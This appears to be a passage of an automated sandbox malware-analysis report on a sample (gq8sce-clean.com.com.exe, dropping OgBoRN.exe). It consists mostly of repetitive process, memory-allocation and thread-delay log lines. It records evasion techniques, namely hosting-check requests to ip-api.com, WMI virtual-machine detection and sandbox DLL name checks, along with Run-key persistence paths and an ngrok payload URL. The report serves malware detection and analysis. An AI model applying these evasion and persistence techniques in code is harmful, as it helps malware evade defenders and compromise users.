              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Check if machine is in data center or colocation facility
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E5E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B58000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.000000000799E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUN$HTTP://IP-API.COM/LINE/?FIELDS=HOSTING(SNXHK.DLL%SBIEDLL.DLL'SF2.DLL&SXIN.DLL)CMDVRT32.DLL+MANUFACTURER,MICROSOFT CORPORATION.MODEL
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPE4HTTPS://KVRCMHQC.NGROK.IO//WINHOST.PIF5\WINHOST.EXE6SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN7SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUN$HTTP://IP-API.COM/LINE/?FIELDS=HOSTING(SNXHK.DLL%SBIEDLL.DLL'SF2.DLL&SXIN.DLL)CMDVRT32.DLL+MANUFACTURER,MICROSOFT CORPORATION.MODEL
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeMemory allocated: 3490000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeMemory allocated: 18E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeMemory allocated: 5AD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeMemory allocated: 6AD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeMemory allocated: 6E00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeMemory allocated: 7E00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 2130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 3DF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 5DF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 65B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 75B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 7B00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 8B00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 2410000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 3E90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 5E90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 66D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 76D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 7950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeMemory allocated: 8950000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599862Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599734Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599594Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599468Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599359Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599250Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599140Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 599031Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598921Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598812Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598703Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598481Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598375Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598265Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 598047Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597937Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597719Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597478Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597358Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597250Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597116Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 597000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596672Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596344Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595344Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595109Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 595000Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594890Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594781Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594672Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594562Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594452Jump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeThread delayed: delay time: 594343Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598666Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598224Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597966Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597818Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597702Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597415Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597309Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597077Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596953Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596844Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596390Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596166Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596049Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595667Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595438Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595313Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 595063Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594953Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594844Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594734Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594609Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594500Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594391Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594266Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594155Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 594041Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593923Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 593811Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599449Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 599016Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598907Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598782Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598563Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598428Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598157Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 598018Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597891Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597767Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597641Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597525Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597417Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597297Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597188Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596954Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596829Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596704Jump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeThread delayed: delay time: 596579Jump to behavior
